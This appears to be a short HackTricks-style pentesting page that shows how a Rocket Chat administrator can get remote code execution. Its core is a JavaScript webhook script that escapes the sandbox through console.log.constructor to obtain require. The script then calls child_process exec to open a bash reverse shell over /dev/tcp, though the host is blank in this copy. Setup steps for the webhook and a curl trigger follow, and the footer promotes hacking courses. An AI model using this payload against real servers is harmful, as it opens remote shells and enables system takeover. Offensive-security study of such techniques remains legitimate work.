Rocket Chat
Reading time: 2 minutes
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If you are admin inside Rocket Chat you can get RCE.
- Got to
and selectNew Integration
and choose any:Incoming WebHook
orOutgoing WebHook
- According to the docs, both use ES2015 / ECMAScript 6 (basically JavaScript) to process the data. So lets get a rev shell for javascript like:
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/ 0>&1'")
- Configure the WebHook (the channel and post as username must exists):
- Configure WebHook script:
- Save changes
- Get the generated WebHook URL:
- Call it with curl and you shuold receive the rev shell
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
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- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.